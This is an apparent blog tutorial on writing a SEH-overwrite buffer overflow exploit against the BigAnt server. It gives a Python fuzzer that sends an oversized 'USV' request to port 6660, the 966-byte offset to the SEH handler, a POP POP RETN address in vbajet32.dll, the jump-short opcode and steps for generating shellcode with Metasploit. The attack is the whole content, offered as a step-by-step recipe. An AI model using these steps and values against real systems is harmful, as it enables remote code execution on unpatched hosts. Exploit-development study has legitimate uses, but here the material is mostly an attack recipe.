Exploit Bigant (SEH)

1. Let's prepare fuzzer

#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fuzzer="\x41" * 2500 + "\r\n\r\n"
s.connect(('192.168.56.101',6660))
s.send('USV '+fuzzer+'\r\n')
print("==============>")
s.close()
print("FInish")

Run Bigant using with Ollydbg and let's look at the result

the application is crash but Value Of EIP is not overwrite. This condition occurred because The application using SEH. to see into SEH, choose menu view --> SEH chain

Now we know that the buffer was saved in SEH chain. press shift+F9 and show resulst

Value of EIP be 41414141

2. Copy file vbajet32.dll from windows

after copying into Backtrack save in folder /pentest/exploits/framework/
root@justview:/pentest/exploits/framework# ./msfpescan -i vbajet32.dll

above command will perform readings DIIcharacteristic function inside the modulevbajet32.dll. are in need of this file is the certainty that there is no value in it 0X0400.value in avoiding 4,5,6,7, C, E and F


3. search locate of command POP, POP RETN in the module.
    On Ollydbg ---> Viev ---> Executable Modules ---> click double file vbajet32.dll. after into window CPU from file vbajet.dll. Right click ---> search for ---> Sequence of Commands

Locate

4. Finding Offset for Overwrite SEH
    After sure with file vbajet32.dll can using as srpingboard into process overwrite address of SEH. now we will looking for on many bytes SEH overwriting.


root@justview:/pentest/exploits/framework/tools# ./pattern_create.rb 2500 > string_pattern.txt

Run Fuzzer after Bigant crash press shift + f9

use pattern Offset

root@justview:/pentest/exploits/framework/tools# ./pattern_offset.rb 42326742
Result 966
 we Know that we need 966 byte to get SEH handler.

4. ell Follow this ways :D

Run Bigant using ollydbg and run fuzzer after Bigant crash press shift + f9

we successfully get into the SEH handler.




5. Controlling the CPU
    Now we get address of byte who using to handler SEH, this time to insert address offset of vbajet32.dll who have command POP, POP RETN into fuzzer. don forget change memory's format be little endian.

Before Run fuzzer, please make break point at address of memory SEH 0F9A196A in module vbajet.dll. and then run the fuzzer  then press shift + f9

RESULT

Table SEH chain, Lead to the vbajet32.dll.

please press F7 untul get command RETN. Ollydbg will bring process into locate stack in the memory.

The Process has been sent into stack

we need another process to to move location into address who have a big memory space.

\xCC (017FFD7C) --> follow in Dump --> Selection. 

and show result

DATA IN MEMORY

we can see that under CC there are a very large empty memory (\x90) start of memory 012CFD84.

now we will using JMP SHORT to order CPU to jump forward a few bytes. 

in assembly language program JMP SHORT has opcode \ xEB \ xZZ, where ZZ is thebyte value entered by the user. to point to the address on the stack need a leap of 6 bytes. \ xeb \ x06 \ X90 \ X90.

+=====> \x06 is command to jump 6 byte.

6.  Make SHELLCODE

Don't Forget RUN service apache

----> root@bt:/pentest/exploits/framework2# ./msfweb

---> Open Browser
127.0.01:55555/payloads.  Choses PAYLOADS

When I running the fuzzer SEH save wrong file.. and i try repair my payloads

FINALLY i wanna say thanks for GOD ALHAMDULILLAH

I'M  SUCCESS